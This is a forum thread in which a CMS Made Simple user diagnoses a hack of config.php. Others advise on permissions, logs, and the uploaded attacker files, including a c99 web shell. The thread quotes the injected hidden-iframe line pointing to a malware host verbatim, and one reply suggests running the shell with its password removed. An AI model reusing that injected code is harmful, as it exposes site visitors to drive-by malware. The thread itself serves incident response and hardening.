Site hacked (config.php), how come?

[HeinzVoerbakje]

Hi all,

My website, running CMS made simple 1.2.3 has been hacked, the following lines have been injected into config.php just after the <?php in the root of the site:

Code: Select all

echo '<__iframe src="http://acdedblshd.com/dl/adv530.php" width=1 height=1></__iframe>';

The code points to a site running malware. (the code will translate to http://..... (h=#104), (t=#116), etc.)

How is this possible, how can I prevent it? I allready removed the code, so everyting is fine again, but I do not want it to happen again.

Thanks, HeinzVoerbakje

[cubix]

can you confirm the permissions set on your config file?

secondly, i would be talking to my host, if this is a shared hosting environment, someone else on the same server may have accessed this file.

it would be a good idea to be looking at your access logs to find out who changed it.

[LeisureLarry]

There are several guides for securing your installation, have you used any of these?

http://forum.cmsmadesimple.org/index.ph ... 684.0.html [french]
http://forum.cmsmadesimple.org/index.ph ... 664.0.html [german]
http://forum.cmsmadesimple.org/index.ph ... 660.0.html [english]

Greats from Germany
LeisureLarry

[HeinzVoerbakje]

can you confirm the permissions set on your config file?

secondly, i would be talking to my host, if this is a shared hosting environment, someone else on the same server may have accessed this file.

it would be a good idea to be looking at your access logs to find out who changed it.

-rw-rw-rw-  config.php

Better change that quickly, I guess it should be -rw-r--r- right? I wonder why it was set to -rw-rw-rw-, I cannot imagine I did that!

[alby]

Better change that quickly, I guess it should be -rw-r--r- right?

Depends on the configuration of your server, you can also try -r--r----- (use -rw-rw-r- for upgrade only)

Alby

[HeinzVoerbakje]

Ok, reading the logs it was done by 212.96.213.210

Using user 'test' (WTF?), who also uploaded two files (dst2.php and image.php) in /uploads/images

Better dig a little deeper still.

[LeisureLarry]

I think he used some problem with your uploads to get the two php files in the folder and started them with his browser to change your config.php.

Change the chmod of your config.php to 444 or 440 and use the guides above to prevent anybody from starting php files in your uploads folder!

Greats from Germany
LeisureLarry

[HeinzVoerbakje]

For anyone interested, these are the files he used, see attachement (I changed the php to txt). It appears the script creates a new user somehow....

[LeisureLarry]

dst2.php seems for me a script for making an attack from your server to another one. Anybody can call this file with ?host=www.xyz.de and use it for attacking the next server. But I cannot say how the attack itself is done, because I couldn´t get the other file to display in clear form.

[blast2007]

dst2.php seems for me a script for making an attack from your server to another one. Anybody can call this file with ?host=www.xyz.de and use it for attacking the next server. But I cannot say how the attack itself is done, because I couldn´t get the other file to display in clear form.

The second script is "c99madshell v.2.0", a php hacking script.

It's very funny to imagine someone spending time for write about 2500 rows of php code for hacking a site.
Maybe Ted could persuade him/them to join dev members and spend his/their time for a good cause 

Regards
blast

P.S. you can decode nested and recursive obfuscated scripts like previous using this php class

[LeisureLarry]

@blast2007:

Did the decode class work for you on the image one? I would like to know what this file does, in order to use this informations for my german cmsms security guide.

- LeisureLarry

[HeinzVoerbakje]

@larry:

Just install it in some safe place, and run it! it will ask for a pwd, but you can simply remove that from the code.

[Pierre M.]

Hello,

-rw-rw-rw-  config.php
Better change that quickly...

Dump the logS. Then wipe your disk and reinstall from scratch the latest official package.
Do you know http://wiki.cmsmadesimple.org/index.php ... mall_Guide ?
What are in the logS ? could the URL filtering rules have prevented it ? How should we improve them ?

Pierre M.

[LeisureLarry]

I think the protection of the uploads-folder against php executions (see the german security guide) would have prevented this hack beside the correct chmod for the config.php.

[Pierre M.]

I think the protection of the uploads-folder against php executions (see the german security guide) would have prevented this hack beside the correct chmod for the config.php.

Sorry, I have not understood/found this uploads-folder protection in the german thread. Please improve the wiki about it.

Pierre M.